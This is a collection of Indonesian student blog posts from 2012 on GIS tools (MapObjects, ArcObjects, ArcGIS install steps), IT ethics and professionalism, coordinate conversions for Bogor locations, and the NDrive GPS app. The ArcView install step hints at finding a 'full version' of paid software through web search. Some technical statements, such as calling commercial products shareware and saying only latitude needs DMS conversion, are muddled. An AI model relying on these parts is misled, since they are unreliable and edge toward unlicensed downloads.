MapObject berfungsi sebagai komponen pemprograman GIS yang sangat handal karena dapat mengakomodir hamper semua kebutuhan kustomisasi yang ingin dilakukan oleh user

MapObject Kelebihan

Walau sudah lama dan terkesan jadul namun Mapobject masih bisa dapat dipercaya akan keakuratannya dalam melakukan hal-hal yang sederhana seperti menampilkan peta tematik, query, cetak dan kebutuhan standart GIS

MapObject Kekurangan

Mapobject biasanya masih dilakukan di desktop sehingga harus dilakukan pemindahan kembali datanya ke server karena aplikasi ini hanya bisa diakses 1 komputer saja (stand alone)

ArcObject Kelebihan

ArcObject menjadi nadi utama dalam Arcgis sehingga sangat diperlukan dalam pembentukkan map gis tersebut karena terdapat dalam Arcgis itu sendiri

ArcObject Kekurangan

Karena ArcObject ini terdapat dalam Arcgis, sehingga dalam pembentukkannya sangatlah berpengaruh untuk GIS itu sendiri.

Minggu, 25 Maret 2012

Pengertian suatu Etika dan Profesionalisme

1. Pengertian Etika

Etika berasal dari bahasa Yunani Kuno: "ethikos", berarti "timbul dari kebiasaan" merupakan cabang utama filsafat yang mempelajari nilai atau kualitas studi mengenai standar dan penilaian moral. Etika mencakup analisis dan penerapan konsep seperti benar, salah, baik, buruk, dan tanggung jawab.

Bersikap dan selalu melakukan aktifitas yang bernilai positif merupakan contoh sebuah etika yang benar dan mempunyai nilai sesuai dengan norma-norma masyarakat, namun sebaliknya jika melakukan suatu aktifitas yang bertentangan dengan suatu nilai dan norma kemasyrakatan mempunyai nilai yang buruk di mata masyarakat.

2. Profesionalisme

Profesionalisme ialah sifat-sifat dari mulai kemampuan, kemahiran, cara pelaksanaan sesuatu. sebagaimana yang sewajarnya dilakukan oleh seorang yang ahli pada bidangnya

Profesionalisme berasal dari kata profesion atau profesi artinya jabatan seseorang yang bersifat komersial ataupun tidak, yang memerlukan keahlian dan keterampilan khusus untuk menjalankannya.

Pada International Encyclopedia of education, ada beberapa ciri yang khas dari suatu profesi, yaitu :

a. Suatu bidang pekerjaan yang terorganisir dari jenis intelektual yang terus berkembang dan diperluas
b. Suatu teknik intelektual
c. Penerapan praktis dari teknik intelektual pada urusan praktis
d. Suatu periode panjang untuk pelatihan dan sertifikasi
e. Beberapa standar dan pernyataan tentang etika yang dapat diselenggarakan
f. Kemampuan untuk kepemimpinan pada profesi sendiri
g. Asosiasi dari anggota profesi yang menjadi suatu kelompok yang erat dengan kualitas komunikasi yang tinggi antar anggotanya
h. Pengakuan sebagai profesi
I. Perhatian yang profesional terhadap penggunaan yang bertanggung jawab dari pekerjaan profesi
j. Hubungan yang erat dengan profesi lain

3. Pengertian TSI

Suatu informasi yang mempunyai fungsi mengumpulkan, memproses, menyimpan, menganalisis, dan menyebarkan informasi untuk tujuan yang spesifik.

4. Etika & Profesionalisme TSI

Etika & Profisinalisme TSI adalah kaidah bagi tingkah laku, keahlian atau kualitas yang dinilai dari seseorang yang profesional dalam menggunakan, memanfaatkan dan berperan dalam Teknologi Sistem Informasi

Beberapa rumusan etika yang tertuang pada kode etik, diantaranya:

a. Standar-standar etika menjelaskan dan menetapkan tanggung jawab terhadap klien, institusi, dan masyarakat pada umumnya.
b. Standar-standar etika membantu tenaga ahli profesi dalam menentukan apa yang harus mereka perbuat kalau mereka menghadapi dilema-dilema etika dalam pekerjaan.
c. Standar-standar etika membiarkan profesi menjaga reputasi atau nama dan fungsi-fungsi profesi dalam masyarakat melawan kelakuan-kelakuan yang jahat dari anggota-anggota tertentu
d. Standar-standar etika mencerminkan / membayangkan pengharapan moral-moral dari komunitas, dengan demikian standar-standar etika menjamin bahwa para anggota akan menaati kitab UU etika (kode etik) profesi dalam pelayanannya
e. Standar-standar etika merupakan dasar untuk menjaga kelakuan dan integritas atau kejujuran dari tenaga ahli profesi
f. Perlu diketahui bahwa kode etik profesi adalah tidak sama dengan hukum (atau undang-undang).
g. Seorang ahli profesi yang melanggar kode etik profesi akan menerima sangsi atau denda dari induk organisasi profesinya

Jumat, 23 Maret 2012

GIS Shareware dan OpenSource

Berikut adalah daftar Aplikasi GIS yang OpenSource:

- SuperSurv 3

- MapProxy

- MXD2map

- MapWindow GIS

- R-CRAN

- MapServer

- GMT

- KFlog

- uDig

- 3map

- Amein!

-DIVA-GIS

Berikut adalah daftar Aplikasi GIS yang Shareware (Berbayar):

- ESRI ArcView

- MapInfo

- Maptitude

- Manifold

-ESRI ARCGIS

Pemasangan ArcView 3.3 pada Windows

Langkah Pemasangan ArcView 3.3:

1. Aplikasi banyak ditemukan di Google, jika ingin mendapatkan aplikasi secara full version di google search: Download ArcView 3.3 Full dan pasti Google akan memberikan alamat Link sebuah situs yang menjurus dari kata kunci tersebut. Setelah mendapatkan aplikasi tersebut, mudah cara menginstallnya, tahapanya sebagai berikut:

2. File yang sudah diunduh biasanya berbentuk .Zip lalu ekstrak dengan Winzip ataupun Winrar, setelah di ekstrak masuk ke dalam folder ekstrakan tadi lalu cari setup.exe:

3. Klik Next hingga ada tombol install dan kemudian setelah proses pemasangan selesai, restart PC dan aplikasi siap dipakai.

Pemasangan Aplikasi ArcGIS-Server.10 untuk Windows XP

Langkah penginstalan ArcGIS Version 10 (Berbayar):
1. System yang dibutuhkan untuk memasang Aplikasi ini yaitu diantaranya:
a. Minimal Windows XP SP3 (Recommended yang digunakan)
b. Dibutuhkan Net.Framework 3.5
c. Dibutuhkan SDK-Java dan SDK .Net 3.5 (Recommended Visual Studio 2008/2010)
d. Mengaktifkan Fungsi IIS (Internet Information System) pada Windows yang digunakan.

2. Langkah Pemasangan ArcGIS pada Windows XP SP3 (Recommended yang digunakan):
a. Disini aplikasi ArcGIS yang digunakan Versi 10 yang telah diunduh, lalu jalankan:


b. Tampilan Saat Aplikasi ArcGIS akan dipasang:


c. Pemasangan GIS yang belum terpasang Net Framework 3.5, SDK-Java dan SDK .Net 3.5:


d. Pemasangan Net Framework 3.5, SDK Java dan SDK .Net 3.5, disini komponen yang dibutuhkan sudah dipersiapkan:


e. Tampilan pemasangan Net FrameWork 3.5:




f. Tampilan pemasangan ArcGIS-Service dan Mengaktifkan Internet Information Service (IIS):




Cara untuk mengaktifkan Fungsi IIS pada Windows XP, masukkan CD Windows XP SP3 lalu beri tanda centrang lalu Next dan tunggu hingga proses selesai:



Jika Pemasangan sudah selesai kembali kepada penginstalan ArcGIS-Service lalu klik Next, maka akan tampilan berikut ini (Settingan Default jangan dirubah), lalu klik Next, Next dan Next, kemudian tunggu hingga proses selesai kurang lebih 15-30 Menit:



Saat Proses pemasangan ArcGIS Server selesai akan tampil gambar 10, klik Cancel karena ini bersifat berbayar maka klik harus melakukan registrasi online dan saya sendiri tidak mengerti bagaimana cara melakukan settingannya (hanya pada tahap pemasangan)


g. Tampilan pemasangan ArcGIS-Web Application:


Komponen yang harus dipasang pada saat pemasangan ArcGIS-Web Application, yang saya gunakan adalah memasang seluruh komponen yang ada di Visual Studio 2008:


Yang diperlukan oleh ArcGIS-Web Application adalah Visual Web Developernya:


Kembali ke tahap pemasangan ArcGIS-Web Application setelah komponen telah terpenuhi:


Setting Port yang dibuka pada IIS yang telah terpasang dan akan dipanggil oleh aplikasi ini, disarankan menggunakan port yang berbeda (Port:443), karena (Port: 80) takut bentrok dengan Localhost yang lain (jika terpasang aplikasi seperti XAMPP, Vertrigo, dll), Klik Next terus hingga sampai program mulai memasang dan tunggu hingga selesai:


h. Tampilan pemasangan ArcGIS-Web ADF runtime dengan setting sama pada Port:443, dan klik Next hingga memulai proses pemasangan lalu tunggu hingga selesai:


i. Pemasangan ArcObjects SDK, memerlukan komponen dari Visual C# dari Visual Studio 2008:


Pemasangan ArcObjects SDK, Klik Next hingga pemasangan mulai dan tunggu hingga selesai:


j. Pemasangan ArcGIS-Server Java Platform, Klik Next hingga proses pemasangan dimulai, dan tunggu hingga selesai:

k. Pemasangan ArcObjects SDK Java Platform, Klik Next hingga proses pemasangan dimulai dan tunggu hingga selesai.


l. Pemasangan Data Interoperability, Klik Next hingga proses pemasangan dimulai dan tunggu hingga selesai.

15 Titik Koordinat tempat dengan Google Maps dan dikonversi Degree Desimal

Menentukan 15 Titik Koordinat dan dikonversi Degree Desimal (Google Maps)

Rumus yang digunakan:

Disini ada sedikit penjelasan bahwa untuk menentukan Degree, Minute dan Second hanya dibutuhkan Latitude saja, karena Longitude untuk mengukur Jarak disini saya Memberi Contoh mengukur jaraknya juga antar A dan B:

Disini perhitungan menggunakan Koordinat Google Maps dengan Excel, dapat dilihat pada gambar dibawah ini Contoh Perhitungan Kebun Raya, Bogor dan Botanical Square, Bogor:


A. Kebun Raya Bogor:
Latitude: -6.600921
Longitude: 106.801633
Degree : 6
Minute: 36
Seconds: 3

B. Botanical Square, Bogor:
Latitude : -6.600623
Longitude: 106.806371
Degree : 6
Minute: 36
Seconds: 2
Distance A-B : 0.524 Km
------------------------------------------------------------------------------------------------------------------------------------

Hasil yang lain dari contoh memasukkan sebuah titik koordinat Location 1 dan Location 2:

A. Istana Bogor
Latitude : -6.598704
Longitude : 106.797824
Degree : 6
Minute : 35
Seconds: 55

B.Bondongan, Bogor
Latitude : -6.586171
Longitude : 106.795088
Degree : 6
Minute : 35
Seconds: 10
Distance A-B : 1.426 Km

A. Bogor Trade Mall, Bogor
Latitude : -6.603564
Longitude : 106.796544
Degree : 6
Minute : 36
Seconds: 13

B.Hotel Salak, Bogor
Latitude : -6.594164
Longitude : 106.79438
Degree : 6
Minute : 35
Seconds: 39
Distance A-B : 1.072 Km

A. Tanah Baru, Bogor
Latitude : -6.565025
Longitude : 106.816607
Degree : 6
Minute : 33
Seconds: 54

B. Tajur, Bogor
Latitude : -6.61614
Longitude : 106.824782
Degree : 6
Minute : 36
Seconds: 58
Distance A-B : 5.755 Km

A. Ekalokasari Plasa, Bogor
Latitude : -6.619508
Longitude : 106.816792
Degree : 6
Minute : 37
Seconds: 10

B. Empang, Bogor
Latitude : -6.585851
Longitude : 106.790904
Degree : 6
Minute : 35
Seconds: 9
Distance A-B : 4.710 Km

A. Cipaku, Bogor
Latitude : -6.606122
Longitude : 106.805792
Degree : 6
Minute : 36
Seconds: 22

B. Ciomas, Bogor
Latitude : -6.586171
Longitude : 106.769829
Degree : 6
Minute : 35
Seconds: 10
Distance A-B : 4.550 Km

A. Universitas Pakuan, Bogor
Latitude : -6.596402
Longitude : 106.813517
Degree : 6
Minute : 35
Seconds: 47

B. Baranang Siang, Bogor
Latitude : -6.583869
Longitude : 106.801136
Degree : 6
Minute : 35
Seconds: 2
Distance A-B : 1.953 Km

A. Dramaga, Institute Pertanian Bogor, Ciampea
Latitude : -6.545583
Longitude : 106.725597
Degree : 6
Minute : 32
Seconds: 44

B. Museum Zoologi, Bogor
Latitude : -6.603159
Longitude : 106.797216
Degree : 6
Minute : 36
Seconds : 11
Distance A-B: 10.177 Km

Kamis, 15 Maret 2012

Mencari titik koordinat lokasi dengan aplikasi Ndrive version 10.1.15

Disini saya menggunakan Handphone Android Galaxy Young, yang terpasang sebuah aplikasi Android yang bernama NDrive, disini saya jelaskan sedikit bahwa aplikasi ini terintegrasi dengan GPS yang terpasang pada Handphone (memiliki fitur GPS). Dimana database map dan fitur yang ada di NDrive berbasis offline tidak runtime (Online).

1. Buka Aplikasi NDrive, lihat pada Gambar 1:


Gambar 1. Aplikasi NDrive pada Android yang sudah terpasang.

2. Pilih Menu, lalu akan muncul tampilan pilih Menu Temukan (Disini saya sudah menentukan alamat Beranda saya, yaitu Jalan Meranti), lihat Gambar 2, Gambar 3, Gambar 4, dan Gambar 5:


Gambar 2. Menu Utama Tampilan NDrive


Gambar 3. Menu Temukan pada NDrive


Gambar 4. Tampilan Peta saat di Menu Temukan di pilih Beranda


Gambar 5. Tampilan saat kita klik koordinat yang sudah dituju lalu akan muncul koordinatnya

Mungkin aplikasi sederhana ini masih banyak kekurangan dari segi fitur yang kurang menarik hanya sebagai navigasi jalan dan harus diluar gedung (berpengaruh untuk mendapatkan sinyal GPS).

Rabu, 07 Maret 2012

Analisa Blog Tersendiri

Ada beberapa Etika untuk menulis pada Blogger, diantaranya:

1. Menghargai dan menjunjung tinggi perlindungan Hak Kekayaan Intelektual dengan menghindari plagiarisme, pembajakan, dan selalu mencantumkan sumber setiap kali mengutip karya orang lain.

2. Tidak mendiskreditkan pihak lain dan selalu berkomitmen untuk menulis secara proporsional.

3. Tidak menampilkan tulisan atau gambar yang mengandung unsur pornografi.

4. Selalu berbagi pengetahuan dan kebaikan melalui blog masing-masing.

5. Tidak berprasangka dan hanya menulis berdasarkan fakta yang diyakini bisa dibuktikan serta tetap dengan menjunjung tinggi etika kesopanan dalam menulis.

6. Tidak melakukan spamming melalui kolom komentar.

7. Tetap menjaga kesopanan dan rasa saling menghormati dalam memberikan komentar pada blog yang dikunjungi.

8. Tidak melakukan hack pada website atau blog lain.

9. Tidak menampilkan tulisan atau gambar yang mengandung unsur SARA.

10. Menggunakan bahasa yang baik dalam menulis.

11. Tetap menjunjung tinggi kebebasan berekspresi dalam menulis tetapi tidak melanggar hak-hak orang lain.

12. Bersedia meralat informasi yang telah ditulis dalam blog jika di kemudian hari terdapat kesalahan dalam memuat tulisan di blog
(Sumber Dikutip dari: http://www.pikiran-rakyat.com/node/150392)

Berdasarkan dari etika tersebut saya mencoba menganalisa blog saya sendiri, apakah blog memenuhi kriteria diatas.

Dari yang saya analisa dari awal penulisan baik dari kata maupun sumber informasi yang didapatkan, hampir semua point masuk ke dalam kriteria tersebut, namun sejujurnya dalam tutur bahasa menurut EYD yang benar masih kurang baik, blog saya belum termasuk point yang ke-10.

Dalam hal penulisan adapun saya akui terdapat plagiat, namun disini saya menjelaskan plagiat yang saya maksudkan adalah, langkah dan tata cara suatu informasi disamakan namun dalam tutur bahasa dibedakan hampir 70%.

Semoga dari banyak pengunjung yang mengunjungi blog ini dapat memberikan kritikan dan saran agar blog ini menjadi baik bagi yang membaca dan mencari informasi yang bermanfaat..